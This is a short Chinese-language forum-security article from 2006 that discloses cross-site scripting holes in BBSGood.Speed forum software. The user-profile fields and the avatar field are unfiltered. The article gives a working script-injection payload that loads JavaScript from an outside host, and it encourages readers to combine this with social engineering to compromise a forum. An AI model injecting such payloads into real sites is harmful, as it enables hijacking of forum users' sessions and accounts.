放飞你的梦想--翱翔我的天空 | 会员登陆 | 繁體中文 | 站点地图 | 站长博客
 | 网站首页 | 文章中心 | IT 前沿 | 清怡画风 | 视频教程 | 资源下载 | 精彩图库 | 博客文赏 | 天空论坛 | 访客留言 | 音乐版 | 
    本站全新推出IT 前沿频道欢迎大家访问 地址 http://it.tkbbs.com  [风雪残士  2005年12月9日]            本站推出新浪VIVI收藏夹服务,欢迎使用  [风雪残士  2005年10月18日]        
您现在的位置: 翱翔翼站 >> 文章中心 >> 网络世界 >> 安全漏洞 >> 文章正文 今天是:
BBSGood.Speed Version 全版本跨站 【字体:
作 者:风雪残士 文章来源:网络 更新:2006-6-24 点击:






用户资料页  电子邮件 生日  真实姓名  联系住址 处均没做过滤  可以在 用户资料修改处写入代码
<script src='//tkbbs.com/fxcs/by1.js'></script>

论坛 头像处 MS有跨站地方 测试 返回修改页面 代码被执行了 跑去看帖子那里 居然被过滤了 郁闷啊
MS 起不了什么危险作用。。  试N遍了 头大了 闪。。。

利用点社会工程学 还是可以搞定论坛的。。自己尝试吧

另 不知道 是不是那论坛太安全了 发贴那居然可以用HTML语法。。。 疯了  当然 我是说我自己



文章录入:风雪残士    责任编辑:风雪残士 
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    相关文章
    没有相关文章
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    最新文章 TOP10
    最新热门 TOP10
    最新推荐TOP10
    翱翔翼站拥有本站所有版权! Copyright © 2005 - 2008 5-IT.COM
    本站维护 :风雪残士

    浙ICP备05039908号
    努力打造国内最全的电脑技术资料库